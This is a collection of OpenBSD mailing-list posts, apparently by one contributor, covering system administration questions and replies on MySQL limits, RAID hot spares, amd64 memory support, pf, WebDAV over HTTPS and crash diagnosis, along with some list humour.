Re: help
On 8 Nov 2010, at 11:33, Joe Warren-Meeks wrote: On 8 November 2010 10:46, steve st...@crs.com wrote: help I need somebody. help... -- When I die I want to go peacefully in my sleep like my Grandfather, not screaming in terror like his passengers. http://playr.co.uk/
Spamd traplist.gz
Are there any problems at the moment with the spamd data files that are hosted in various locations? I'm getting lots of FTP errors: On 12 Aug 2010, at 16:01, Cron Daemon wrote: ftp: connect: Connection timed out ftp: connect: Connection timed out ftp: connect: Connection timed out ftp: connect: Connection timed out From machines at various sites, pointing to an error somewhere with the master servers. Running spamd-setup in debug mode: # /usr/libexec/spamd-setup -d Getting http://www.openbsd.org/spamd/traplist.gz ftp: connect: Connection timed out blacklist uatraps 0 entries Getting http://www.openbsd.org/spamd/nixspam.gz ftp: connect: Connection timed out blacklist nixspam 0 entries Getting http://www.openbsd.org/spamd/chinacidr.txt.gz ... So something somewhere is amiss. A firewall upgrade that blocked ports 20/21 in error perhaps? G. -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/
Re: OpenBSD mascotte
On 25 Jul 2010, at 21:54, Christian Weisgerber wrote: (I'm sure if somebody WANTED to, more of them could be made. Somebody would have to talk to Steiner, find out if they still have the patterns on file, if not give them an old plushie as a template, maybe go through a few prototypes, front a few thousand euros for a hundred-unit or so production run, and then figure out how to sell them.) If you just wanted a handful then you might be able to find somebody here who would make them: http://etsy.com/ G. -- Sent from my email program on my computer sitting on my desk in my house. http://playr.co.uk/
New Installer: Thank you
It's been a while since I've upgraded a box (or ran the installer for that matter) and this was the first time I used the bsd.rd kernel to do it. I'd like to give a massive thank you to all the developers who have worked on the new installer and upgrade documentation, it made upgrading a 4.4 machine to 4.7 a piece of cake. It's a really smooth process, you can see where the effort has been spent. Excellent work guys, keep it up :) Gaby. -- I'm on a horse! http://playr.co.uk/
Re: How to make FTP work from the firewall system?
On 16 Mar 2010, at 17:24, Dave Anderson wrote: I'm configuring a notebook which will use PF to protect itself from the environments in which I use it, and would like to have FTP 'just work' on it -- whether it's from an explicit FTP command, from a browser, or embedded in some other program or script. Not really been following this thread but is there any problem with using SFTP? It's implemented in many FTP programs and only requires port 22 open on the firewall. G. -- Expounding the theory of infinite Abelian Badgers http://playr.co.uk/
Re: Apache - bandwidth usage limit per vhost
On 9 Mar 2010, at 17:42, Ozgur Kazancci wrote: I'd like to set a (monthly) bandwidth quota limit to my Apache virtualhosts. For instance, domain.com would have an amount of 10G/Month bandwidth limit (and in case of exceeding the limit, it'd get redirected to a Bandwidth limit exceeded alert page.) I too would be very interested in something that works with the stock Apache in 4.6. Gaby. -- Imagine there were no hypothetical situations. http://playr.co.uk/
Re: Apache - bandwidth usage limit per vhost
On 9 Mar 2010, at 17:42, Ozgur Kazancci wrote: Apache doesn't come with such a feature. I tried mod_cband. It was quite unstable, has too many bugs, issues. (Dozens of unfixed security issues, bugs since few years: http://sourceforge.net/tracker/?group_id=154335atid=791368 ), there is no more development for that module and it is abandoned by its developer. I tried some other modules such as mod_bandwidth, mod_curb, mod_bw, but no luck. Pretty old and 'expired' modules. Thinking about this a little more, you could perhaps create a LogFormat string that dumped the hostname, bytes in and out to a logfile somewhere. This could then be parsed every 5 minutes or so by a cron job, stats tabulated and Apache configs adjusted accordingly. You could then perhaps have a RewriteRule and use a RewriteMap to match specific hostnames that need redirecting to the bandwidth reached page. When a host hits it's bandwidth limit then an entry is created in the map and that site gets redirected to the holding page. Just a vague idea, probably full of holes but it could be a step in the right direction. G. -- Being drunk is feeling sophisticated without being able to say it. http://www.playr.co.uk/
Re: Joomla - MySQL Problem: Could not connect to MySQL
On 8 Mar 2010, at 21:07, Jan wrote: Unable to connect to the database: Could not connect to MySQL Check that your code is connecting to 127.0.0.1 instead of localhost? Usually fixes it for me and you don't need to worry messing around with sockets. G. -- Bought to you by the Department of Redundancy Department's Recursion Division of Recursion http://playr.co.uk/
Re: route default
On 7 Feb 2010, at 17:50, Bret S. Lambert wrote: On Sun, Feb 07, 2010 at 06:29:27PM +0100, Jean-Francois wrote: Hello, Since sometime, I need to add default route as route add default 192.168.1.1 in order to be able to reach internet, otherwise I have (no route to host). I would like to automate this in a proper way as it should be. If you're pulling from dhcp, that should be populated automatically. But if you just need to set it for a system with a static IP, ``man mygate'' will show you what you need to do. This should have been automatically configured when you did the initial installation. What did you skip in there? G. -- Being drunk is feeling sophisticated without being able to say it. http://www.playr.co.uk/
Backplanes
Does anybody have any good/bad experiences using any of the IcyBox SATA backplanes? They're not expicitly listed in /i386.html and I'm looking to use one with an LSI MegaRaid card in RAID5 mode. Some have one port per drive, some have two ports for all 5 drives, I guess I want the one port per drive model but having not used a backplane before I'd love to hear any tips and advice on offer. Thanks, Gaby -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/
Re: Backplanes
On 4 Oct 2009, at 17:11, Marco Peereboom wrote: Don't use dual port on SATA unless you have some sort of interposer (little device between the drive and the backplane) that unfucks the SATA protocol. The current setup is a 4 channel SATA RAID card directly connected to each of the four drives. I suppose all I really need is just a set of removable caddies, perhaps a dedicated backplane is overkill. G. -- Expounding the theory of infinite Abelian Badgers http://playr.co.uk/
AMD64 with 4GB RAM
Does anybody know the status of large memory support in 4.5/amd64? I found this about 4.4 not finding the full 4GB: http://kerneltrap.org/mailarchive/openbsd-misc/2008/12/15/4420904 And this about bigmem causing boot failure: http://kerneltrap.org/index.php?q=mailarchive/openbsd-misc/2008/10/8/3555614/thread And I've looked at the changelog between 4.4 and 4.5 for any memory related changes. I have a machine with 4GB RAM and a quad core Xeon processor. Will it be able to see the full 4GB of RAM or will I have to tweak bigmem, either by building a custom kernel (really don't want to do that) or by using config()? Gaby. -- Uganda Maximum - Enemy of the English Thrust http://www.playr.co.uk/
Re: AMD64 with 4GB RAM
On 22 Jun 2009, at 14:58, Thomas Pfaff wrote: On Mon, 22 Jun 2009 12:37:08 +0100 Gaby Vanhegan g...@vanhegan.net wrote: I have a machine with 4GB RAM and a quad core Xeon processor. Will it be able to see the full 4GB of RAM or will I have to tweak bigmem, either by building a custom kernel (really don't want to do that) or by using config()? You can't use config to toggle bigmem. You need to set the bigmem variable to 1 in /usr/src/sys/arch/amd64/amd64/machdep.c, then you compile and install a new kernel. http://www.openbsd.org/faq/faq5.html#BldKernel explains how. I'd gathered that from reading one of those threads to the end. I really wanted to avoid having to build a custom kernel, especially if the results might not even work. I suppose I was just inquiring about the status of bigmem in 4.5 and if it is considered safe to use yet? G. -- Sent from my email program on my computer sitting on my desk in my house. http://playr.co.uk/
amd64 on Xeon X3220
I've been googling around for any information about OpenBSD on this hardware. I want to get up and running in 64bit mode but the only thread I've found about this chip in a Dell R200 server was about having problems with a 4.1 install. Am I likely to hit any problems installing 4.5 on a Xeon X3220 in a Dell R200 server? I'm about to commission a server to test this out but if anybody has any pointers then I'd love to hear them :) Gaby. -- Being drunk is feeling sophisticated without being able to say it. http://www.playr.co.uk/
Re: amd64 on Xeon X3220
On 16 Jun 2009, at 12:42, Toni Mueller wrote: I've been googling around for any information about OpenBSD on this hardware. hmmm I can only tell you that it works on an X3230 (Supermicro, though). The machine works for me since a few months now. Getting a test machine that you can keep if it turns out to work is always recommended, imho. Are you running it in 64bit mode? G. -- Imagine there were no hypothetical situations. http://playr.co.uk/
Re: amd64 on Xeon X3220
On 16 Jun 2009, at 14:19, Marco Peereboom wrote: Works fine. Theo uses a pair as bgp boxes. Are they used in 64bit mode? G. -- Being drunk is feeling sophisticated without being able to say it. http://www.playr.co.uk/
Re: amd64 on Xeon X3220
On 16 Jun 2009, at 14:30, Gaby Vanhegan wrote: On 16 Jun 2009, at 14:19, Marco Peereboom wrote: Works fine. Theo uses a pair as bgp boxes. Are they used in 64bit mode? Of course I realise now the complete and utter stupidity of this question. Please ignore. (And how much is this free weekend?) G. -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/
Re: MySQL and ulimit
On 9 Jun 2009, at 22:43, Daniel Ouellet wrote: If I may asked, why would you really want to get a 2GB buffer? The app generates a lot of database traffic, as well as doing some fairly large transactional queries, hence the need for InnoDB. MySQL queries keep failing with lack of memory errors: 090609 17:23:42 [ERROR] /usr/local/libexec/mysqld: Out of memory (Needed 1048548 bytes) 090609 17:25:10 [ERROR] /usr/local/libexec/mysqld: Out of memory (Needed 260160 bytes) 090609 17:25:11 [ERROR] /usr/local/libexec/mysqld: Out of memory (Needed 260160 bytes) 090609 17:25:11 [ERROR] /usr/local/libexec/mysqld: Out of memory (Needed 260160 bytes) 090609 17:25:11 [ERROR] /usr/local/libexec/mysqld: Out of memory (Needed 260208 bytes) 090609 17:25:11 [ERROR] /usr/local/libexec/mysqld: Out of memory (Needed 1048548 bytes) 090609 17:25:23 [ERROR] /usr/local/libexec/mysqld: Out of memory (Needed 260464 bytes) And bouncing the MySQL server seems to bring it back to life. If I can't change the hard limits on the OS, is there something I can do to MySQL to make it happier? G. -- Bought to you by the Department of Redundancy Department's Recursion Division of Recursion http://playr.co.uk/
MySQL and ulimit
I'm having an annoying time trying to make MySQL run with a large amount of buffer memory. I have 4Gb of RAM and 8Gb of swap and I need to increase the data size limit for the _mysql login class. Currently it's set to unlimited but it doesn't seem to be coming through to the _mysql login class: $ ulimit -a time(cpu-seconds)unlimited file(blocks) unlimited coredump(blocks) unlimited data(kbytes) 1048576 stack(kbytes)8192 lockedmem(kbytes)1101134 memory(kbytes) 3301268 nofiles(descriptors) 2048 processes1310 $ whoami _mysql I need to increase the data limit as we're hitting the limits with the large InnoDB pool size. I must be doing something wrong but I can't see the obvious problem that I'm hitting. Help? I have a large InnoDB buffer pool configured and every time I fire up MySQL I keep getting this error: # Starting mysqld daemon with databases from /var/mysql 090609 21:23:51 mysqld started 090609 21:23:51 InnoDB: Error: cannot allocate 1073758208 bytes of InnoDB: memory with malloc! Total allocated memory InnoDB: by InnoDB 14810216 bytes. Operating system errno: 12 InnoDB: Check if you should increase the swap file or InnoDB: ulimits of your operating system. InnoDB: On FreeBSD check you have compiled the OS with InnoDB: a big enough maximum process size. InnoDB: Note that in most 32-bit computers the process InnoDB: memory space is limited to 2 GB or 4 GB. InnoDB: We keep retrying the allocation for 60 seconds... MySQL comes up but the innodb tables don't. This is the latest 4.5 release, upgraded yesterday, running the latest package of MySQL. Haylp! G. -- Imagine there were no hypothetical situations. http://playr.co.uk/
Re: MySQL and ulimit
Thanks for getting back to me so swiftly, I've been banging my head against this for a couple of days now... :( On 9 Jun 2009, at 22:06, Daniel Ouellet wrote: Gaby Vanhegan wrote: I'm having an annoying time trying to make MySQL run with a large amount of buffer memory. I have 4Gb of RAM and 8Gb of swap and I need to increase the data size limit for the _mysql login class. Currently it's set to unlimited but it doesn't seem to be coming through to the _mysql login class: How do you start your MySQL, do you actually tell it to use that class? The server is started thusly: sudo -c _mysql /usr/local/bin/mysqld_safe And also: # getcap -c datasize -f /etc/login.conf _mysql =infinity # getcap -c datasize-max -f /etc/login.conf _mysql =2048M # getcap -c datasize-cur -f /etc/login.conf _mysql =2048M On 9 Jun 2009, at 22:07, Ted Unangst wrote: There are hard limits that you can't exceed. If the machine has mare than enough physical RAM and tons of swap, is there no way to configure MySQL to hold a 2Gb buffer in memory? I really want to avoid building a custom kernel and it feels like I should be able to get this working using login.conf, ulimit and sysctl settings. Or is this a wall that is not meant to be broken through? G. -- Being drunk is feeling sophisticated without being able to say it. http://www.playr.co.uk/
Crash diagnosis
I have a machine that is running 4.3 bsd.mp, MySQL and one single site of PHP scripts which keep crashing. The frustrating thing is that it doesn't panic the kernel so I can't get any DDB output, the machine just locks up. Looking at it over the KVM it just shows the login prompt with the cursor flashing but not responding. Where do I go from here? How can I debug a problem that has no symptoms other than the system silently locking up? I'd love to provide more information but there's nothing to give. We've swapped out the entire machine, tried the UP and MP kernels but no joy. The plan is to upgrade it to 4.5 and see if the problems persist. Failing that we're looking at a clean install on a brand new machine but I'd like to avoid that if possible. Any suggestions about how I can try and figure out what's killing it? Many thanks, G. demsg follows OpenBSD 4.3 (GENERIC.MP) #587: Wed Mar 12 11:21:57 MDT 2008 dera...@i386.openbsd.org:/usr/src/sys/arch/i386/compile/GENERIC.MP cpu0: Intel(R) Xeon(R) CPU X3220 @ 2.40GHz (GenuineIntel 686-class) 2.41 GHz cpu0: FPU ,V86 ,DE ,PSE ,TSC ,MSR ,PAE ,MCE ,CX8 ,APIC ,SEP ,MTRR ,PGE ,MCA ,CMOV ,PAT ,PSE36,CFLUSH,DS,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,SBF,SSE3,MWAIT,DS- CPL,VMX,EST,TM2,CX16,xTPR real mem = 3487866880 (3326MB) avail mem = 3383980032 (3227MB) mainbus0 at root bios0 at mainbus0: AT/286+ BIOS, date 03/05/08, BIOS32 rev. 0 @ 0xfac90, SMBIOS rev. 2.5 @ 0xcff9c000 (46 entries) bios0: vendor Dell Inc. version 1.2.1 date 03/05/2008 bios0: Dell Inc. PowerEdge R200 acpi0 at bios0: rev 2 acpi0: tables DSDT FACP APIC SPCR HPET MCFG WD__ SLIC ERST HEST BERT EINJ SSDT SSDT SSDT SSDT SSDT acpi0: wakeup devices PCI0(S5) acpitimer0 at acpi0: 3579545 Hz, 24 bits acpimadt0 at acpi0 addr 0xfee0: PC-AT compat cpu0 at mainbus0: apid 0 (boot processor) cpu0: apic clock running at 266MHz cpu1 at mainbus0: apid 1 (application processor) cpu1: Intel(R) Xeon(R) CPU X3220 @ 2.40GHz (GenuineIntel 686-class) 2.41 GHz cpu1: FPU ,V86 ,DE ,PSE ,TSC ,MSR ,PAE ,MCE ,CX8 ,APIC ,SEP ,MTRR ,PGE ,MCA ,CMOV ,PAT ,PSE36,CFLUSH,DS,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,SBF,SSE3,MWAIT,DS- CPL,VMX,EST,TM2,CX16,xTPR cpu2 at mainbus0: apid 2 (application processor) cpu2: Intel(R) Xeon(R) CPU X3220 @ 2.40GHz (GenuineIntel 686-class) 2.41 GHz cpu2: FPU ,V86 ,DE ,PSE ,TSC ,MSR ,PAE ,MCE ,CX8 ,APIC ,SEP ,MTRR ,PGE ,MCA ,CMOV ,PAT ,PSE36,CFLUSH,DS,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,SBF,SSE3,MWAIT,DS- CPL,VMX,EST,TM2,CX16,xTPR cpu3 at mainbus0: apid 3 (application processor) cpu3: Intel(R) Xeon(R) CPU X3220 @ 2.40GHz (GenuineIntel 686-class) 2.41 GHz cpu3: FPU ,V86 ,DE ,PSE ,TSC ,MSR ,PAE ,MCE ,CX8 ,APIC ,SEP ,MTRR ,PGE ,MCA ,CMOV ,PAT ,PSE36,CFLUSH,DS,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,SBF,SSE3,MWAIT,DS- CPL,VMX,EST,TM2,CX16,xTPR ioapic0 at mainbus0: apid 4 pa 0xfec0, version 20, 24 pins ioapic0: misconfigured as apic 0, remapped to apid 4 acpihpet0 at acpi0: 14318179 Hz acpiprt0 at acpi0: bus 0 (PCI0) acpiprt1 at acpi0: bus 1 (PEX1) acpiprt2 at acpi0: bus 3 (SBE0) acpiprt3 at acpi0: bus 4 (SBE4) acpiprt4 at acpi0: bus 5 (SBE5) acpiprt5 at acpi0: bus 6 (COMP) acpicpu0 at acpi0: FVS, 2400, 2133, 1867, 1600 MHz acpicpu1 at acpi0: FVS, 2400, 2133, 1867, 1600 MHz acpicpu2 at acpi0: FVS, 2400, 2133, 1867, 1600 MHz acpicpu3 at acpi0: FVS, 2400, 2133, 1867, 1600 MHz bios0: ROM list: 0xc/0x9000 0xc9000/0x1000 0xca000/0x1800 0xcb800/0x5c00 0xec000/0x4000! ipmi at mainbus0 not configured pci0 at mainbus0 bus 0: configuration mode 1 (no bios) pchb0 at pci0 dev 0 function 0 vendor Intel, unknown product 0x29f0 rev 0x01 ppb0 at pci0 dev 1 function 0 vendor Intel, unknown product 0x29f1 rev 0x01: apic 4 int 16 (irq 15) pci1 at ppb0 bus 1 ppb1 at pci1 dev 0 function 0 Intel PCIE-PCIE rev 0x09 pci2 at ppb1 bus 2 mpi0 at pci2 dev 8 function 0 Symbios Logic SAS1068 rev 0x01: apic 4 int 16 (irq 15) scsibus0 at mpi0: 112 targets sd0 at scsibus0 targ 0 lun 0: Dell, VIRTUAL DISK, 1028 SCSI3 0/ direct fixed sd0: 151634MB, 151634 cyl, 16 head, 128 sec, 512 bytes/sec, 310546432 sec total ppb2 at pci0 dev 28 function 0 Intel 82801I PCIE rev 0x02: apic 4 int 16 (irq 15) pci3 at ppb2 bus 3 ppb3 at pci0 dev 28 function 4 Intel 82801I PCIE rev 0x02 pci4 at ppb3 bus 4 bge0 at pci4 dev 0 function 0 Broadcom BCM5721 rev 0x21, BCM5750 C1 (0x4201): apic 4 int 16 (irq 15), address 00:1e:c9:ff:14:38 brgphy0 at bge0 phy 1: BCM5750 10/100/1000baseT PHY, rev. 0 ppb4 at pci0 dev 28 function 5 Intel 82801I PCIE rev 0x02 pci5 at ppb4 bus 5 bge1 at pci5 dev 0 function 0 Broadcom BCM5721 rev 0x21, BCM5750 C1 (0x4201): apic 4 int 17 (irq 14), address 00:1e:c9:ff:14:39 brgphy1 at bge1 phy 1: BCM5750 10/100/1000baseT PHY, rev. 0 uhci0 at pci0 dev 29 function 0 Intel 82801I USB rev 0x02: apic 4 int 21 (irq 11) uhci1 at pci0 dev 29 function 1 Intel 82801I USB rev 0x02: apic 4 int 20 (irq 10) uhci2 at
Re: Crash diagnosis
On 8 Jun 2009, at 16:46, Josh Grosse wrote: On Mon, 8 Jun 2009 15:56:48 +0100, Gaby Vanhegan wrote Any suggestions about how I can try and figure out what's killing it? If sysctl ddb.console=1, and the OS is still accepting interrupts from the console, then a CTRL-ALT-Esc or Break will force the kernel to ddb. I've added that into sysctl.conf so we'll just have to wait and see what happens next time. Thanks for the pointer though, it may provide some more insight. G. -- When I die I want to go peacefully in my sleep like my Grandfather, not screaming in terror like his passengers. http://playr.co.uk/
Re:
On 27 May 2009, at 16:54, Bob Beck Via Secure Email wrote: Hi this is bob. really. I can haz Ur Passwordz plz? Yes, my passwords are: god, sex and please. ohai, and Ur bank accountz and sinz too? Account no. 7337h4x0r5, my SIN is one of omission. I'm trusting you with these so don't do anything stupid like post them on a mailing list or something. -- Being drunk is feeling sophisticated without being able to say it. http://www.playr.co.uk/
Re:
On 27 May 2009, at 17:38, bofh wrote: On a post it in her drawer (and no, I will not be drawn into a discussion of the possible meanings of drawer in the .us vs .uk versions). benny-hill Something about rifling through her drawers /benny-hill -- When I die I want to go peacefully in my sleep like my Grandfather, not screaming in terror like his passengers. http://playr.co.uk/
Re: Is Jesus God
On 11 May 2009, at 22:40, Marco Peereboom wrote: On Mon, May 11, 2009 at 03:24:15PM -0500, James wrote: !DOCTYPE HTML PUBLIC -//W3C//DTD HTML 4.0 Transitional//EN HTMLHEAD META http-equiv=Content-Type content=text/html; charset=unicode META content=MSHTML 6.00.6001.18226 name=GENERATOR/HEAD BODY PHere is your Topic of the Month. Please log in at A href=http://www.jesus4athiest.org;www.jesus4athiest.org/A/P PTopic: nbsp;Is Jesus God/P Ppeace-james/P/BODY/HTML no But at least he uses a DOCTYPE tag. -- Being drunk is feeling sophisticated without being able to say it. http://www.playr.co.uk/
Re: I can't modify the main menu in gnome
On 7 Apr 2009, at 20:32, Jose P.G wrote: Hi, i am logged as root and when i try to enable Internet, games... and i press close it doesn't works, it stays inactive. Somebody could helpo me? I don't understand why this is happening. And: Hi, i have installed openbsd 4.4 with gnome and i don't know what package i have to install for mount HDDs or usbs. Somebody could helo me? Try this: http://openbsd.org/faq/ This will serve you very well. G. -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/
Re: About the OS - The basics
On 4 Apr 2009, at 21:01, Manuel Carrasco wrote: I don't know too much, so i am here, asking if somebody can help me, the basics. Try this: http://openbsd.org/faq/ This will serve you very well. -- When I die I want to go peacefully in my sleep like my Grandfather, not screaming in terror like his passengers. http://playr.co.uk/
Re: OT, .. but eCommerce?
On 12 Dec 2008, at 17:10, Michiel van der Kraats wrote: oscommerce works but is a mixed bag. I've heard similar things about osCommerce. I have been recommended this: http://www.shopify.com/ If you can let go of the hosting then it looks rather sweet. G. -- Imagine there were no hypothetical situations. http://playr.co.uk/
Re: RAID Hot Spare
On 18 Jun 2008, at 16:51, Marco Peereboom wrote: As far as I know I fixed the hot-spare thing on ami. If that is not the case let me know. I booted into the card's BIOS and confirmed that the drive was marked as hot spare. It seems to have worked, and this is on 4.1 as well. Thanks! Gaby. -- Uganda Maximum - Enemy of the English Thrust http://www.playr.co.uk/
RAID Hot Spare
We had a drive failure on a RAID5 (LSI MegaRaid SATA 150-4) volume in our server (OpenBSD 4.1/x86). The hot spare kicked in and the volume rebuilt fine after a successful fsck in single user mode. We put in a new drive as the new hot spare: # bioctl -Div ami0 bioctl: cookie = 0xd2a23c10 bio_inq bio_inq { 0xd2a23c10, ami0, 2, 4 } Volume Status Size Device ami0 0 Online 501991079936 sd0 RAID5 0 Online 250995539968 0:0.0 noencl Maxtor 6V250F0 VA11 'V594LE9G' 1 Online 250995539968 0:1.0 noencl Maxtor 6V250F0 VA11 'V5075JVG' 2 Online 250995539968 0:3.0 noencl Maxtor 6V250F0 VA11 'V5064EEG' ami0 1 Hot spare250053918720 0:2.0 noencl WDC WD2500AAKS-00VSA01.0 ' WD-WMART1158126' # The thing is the hot spare is fractionally smaller than the other drives, which is what happens when you go into a shop and ask for a 250G drive. What's going to happen if another drive fails and the RAID array tries to rebuild onto the slightly smaller hot spare? Will it explode or just error out? Do we need to go back and put a slightly larger drive in? I know this isn't the ideal place to ask the question but I figure we can't be the only people running LSI cards under OpenBSD. So far I can't find any good references on the 'net but my logic and intuition tells me that the drive needs to be bigger... G. -- Being drunk is feeling sophisticated without being able to say it. http://www.playr.co.uk/
Re: n2k8 network hackathon
On 8 May 2008, at 20:24, Theo de Raadt wrote: Perhaps some who watch the commit logs have already figured out that most of the network developers are currently involved in a week-long network hackathon in Japan. A bit more information about this can be found at http://openbsd.org/hackathons.html#n2k8 Any pictures of the festivities online? Gaby. -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/
Re: man ftp site is very slow
On 7 Mar 2008, at 11:49, arthur wrote: I am loading cd43.iso from ftp.openbsd.org and it is 4.2k/s. Anything wrong, or just to busy. Loading from FBSD is 146k/s so it is not problem with my internet. You could try using a more local mirror? http://www.openbsd.org/ftp.html Gaby. -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/
femail/chroot
Hi, I'm struggling to make femail work in the Apache chroot. I made mini_sendmail work from ports, but this isn't ideal as it requires sh inside the chroot, so I've done away with that idea. femail is the suggested alternative but I have had no success in making it work. I have compiled the 0.97 version from source, that works fine. I can send mail from the command line fine, I have setup a very basic femail.conf and put it in /etc/femail.conf, as well as /var/www/etc/ femail.conf. Both femail and mini_sendmail work fine on the command line, mini_sendmail works fine in apache, femail does not. The only error output I see if in /var/www/logs/error_log, which is the line Abort Trap. In order to get this, I still have to have sh inside the chroot. Is femail going to need this too? Has anybody had any success setting up femail inside the apache chroot? Gaby -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/
Re: communism is good
On 5 Sep 2007, at 18:13, Nick Guenther wrote: On 9/5/07, Josef Stalin [EMAIL PROTECTED] wrote: communism is good, openbsd comrades. it is very nice. Party on. In communist russia, OpenBSD develops you! -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/
inet6 buffer overflow
Hi, Reading the security advisory for the ipv6 buffer issue, the workaround is to block inet6 traffic in pf.conf. My default block line is actually: block in on $ext_if Where $ext_if is the net connection (the only network connection the machine is plugged into). Is the rule: block in inet6 Redundant in this case, or should it still be added? Gaby -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
Re: A PHP management interface for OpenBSD ?
On 25 Jan 2007, at 03:52, Darren Spruell wrote: On 1/24/07, chefren [EMAIL PROTECTED] wrote: On 1/25/07 1:34 AM, Passeur wrote: We are in the process of developing a PHP framework with a web frontend to manage the OpenBSD settings through a web browser. A friend advised me not to do that because of all the security holes I will introduce on OpenBSD. He advised me rather using PHP to use CGI/PERL. What is your opinion ? There's a perfectly good remote management interface for OpenBSD. sshd(8). If you really have to use php, a framework suggested to my by a fellow tech at a company that I used to work for seemed sane. 1. Use PHP to manage a configuration on a totally separate box (the config box). 2. Use ssh to roll that configuration out to the live box, from the config box. This way you're not opening up your entire system to php vulns, the machine that does the configuration should be securely locked away, inaccessible from the outside world, and you're administering the machine in a secure manner. Use ssh keyed authentication to remove the need for passwords and you're away. You can even make the config box manage many configurations, just store the configuration in a database, dynamically create any configuration files on the config box and scp them over to the live box. Thoughts? Gaby -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
Re: Secure perl forum board software
On 21 Jan 2007, at 17:58, bofh wrote: And along those lines, some simple photo album type thingy? SWMBO wants to put something up for family members to see, and I prefer not to use one of those big commercial things. shameless plug http://vanhegan.net/software/microalbum/ /shameless plug Disclaimer: I am the author of the software. Gaby -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
Re: OT: TinyMCE security and track records
On 21 Dec 2006, at 20:02, Daniel Ouellet wrote: Any valid feedback on the security and stability of this one on OpenBSD, or any other prefer. I am looking more for security and stability oppose to bell and whistle and features. I was under the impression that TinyMCE, and other htmlarea based WYSIWYG editors are all a huge mass of client side javascript, and therefore don't really pose a security issue to the server that hosts them. It essentially just replaces a textarea, and the value returned by the form may contain some HTML as a result. Just make sure that you sanitise and validate the data posted by the form (remove JavaScript, unwanted HTML tags, etc, the usual stuff). Gaby -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
Re: WebDAV
On 3 Dec 2006, at 21:12, Pete Vickers wrote: I've used it problem free with osx windows clients; it should probably only be available only over https, Amusingly, that's almost the exact same setup I ended up with :) I also had a non-ssl site serving from the same web root and denied access to that. My subfolder was /md/ and I had: VirtualHost hostname.com:80 ... Location /md Deny from all /Location /VirtualHost VirtualHost hostname.com:443 ... SSLEngine On ... Location /md DAV On ... /Location /VirtualHost This way the site is visible over normal http with the DAV protected section hidden, and the DAV area is only accessible over https. Gaby -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
WebDAV
Hi, Although the mail archives have little on the topic, as does google, are there any major security concerns I should be aware of when installing mod_dav under the stock OpenBSD apache1.3, with apache chrooted? Gaby -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
MySQL, pulling my hair out
I'm really having an incredibly painful time with MySQL on 3.9. Has anybody had a problem getting MySQL 4 or 5 to play happy? I've read these pages: http://www.openbsdsupport.org/mysql.htm http://monkey.org/openbsd/archive/misc/0411/msg03296.html http://marc.theaimsgroup.com/?l=openbsd-miscm=111881975209858w=2 http://marc.theaimsgroup.com/?l=openbsd-miscm=111887588311627w=2 And applied it to MySQL 5, both from ports, and the latest 4.x release built from source. I still get the database basically locking under moderate load, or failing to do a mysqlcheck. The errors I get (from the .err file) are along these lines: 061119 18:03:31 [ERROR] /usr/local/libexec/mysqld: Can't find file: './condor5/user.frm' (errno: 9) 061119 18:03:31 [ERROR] /usr/local/libexec/mysqld: Can't find file: './condor5/user_in_group.frm' (errno: 9) 061119 18:03:31 [ERROR] /usr/local/libexec/mysqld: Can't find file: './condor5/user_in_group.frm' (errno: 9) (using 4.x) Or these when doing the suggested mysqlcheck command: mysql.columns_priv OK mysql.db OK mysql.func error: File './mysql/func.MYD' not found (Errcode: 9) mysql.help_category error: File './mysql/help_category.MYD' not found (Errcode: 9) mysql.help_keyword error: File './mysql/help_keyword.MYD' not found (Errcode: 9) mysql.help_relation error: File './mysql/help_relation.MYD' not found (Errcode: 9) mysql.help_topic error: File './mysql/help_topic.MYD' not found (Errcode: 9) I've followed all the instructions on the relevant pages, and instructions form the mail archives but to no avail. I have a theory that it doesn't hold up under the load of dspam using MySQL as it's back end, and I'll be trying that running under something else but for the moment, normal every day databases just stop working after a while. What have you had to do to get MySQL up and running properly? # sysctl kern.maxfiles kern.maxfiles=13666 # cat /etc/login.conf ... # # MySQL daemon # _mysql:\ :datasize=infinity:\ :maxproc=infinity:\ :openfiles-cur=2048:\ :openfiles-max=8192:\ :stacksize-cur=8M:\ :localcipher=blowfish,8:\ :tc=default: # userinfo _mysql login _mysql passwd * uid 502 groups _mysql change NEVER class _mysql gecos MySQL Account dir /nonexistent shell /sbin/nologin expire NEVER # cat /etc/my.cnf | grep files open_files_limit = 2048 # dmesg OpenBSD 3.9 (GENERIC.MP) #598: Thu Mar 2 02:37:06 MST 2006 [EMAIL PROTECTED]:/usr/src/sys/arch/i386/compile/GENERIC.MP cpu0: Intel(R) Pentium(R) D CPU 2.66GHz (GenuineIntel 686-class) 2.68 GHz cpu0: FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36, CFLUSH,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,SBF,SSE3,MWAIT,TM2,CNXT-ID real mem = 2146541568 (2096232K) avail mem = 1952505856 (1906744K) using 4278 buffers containing 107429888 bytes (104912K) of memory mainbus0 (root) bios0 at mainbus0: AT/286+(00) BIOS, date 10/30/05, BIOS32 rev. 0 @ 0xf0010 apm0 at bios0: Power Management spec V1.2 apm0: AC on, battery charge unknown apm0: flags 30102 dobusy 0 doidle 1 pcibios at bios0 function 0x1a not configured bios0: ROM list: 0xc/0x8000 0xc8000/0x2200 mainbus0: Intel MP Specification (Version 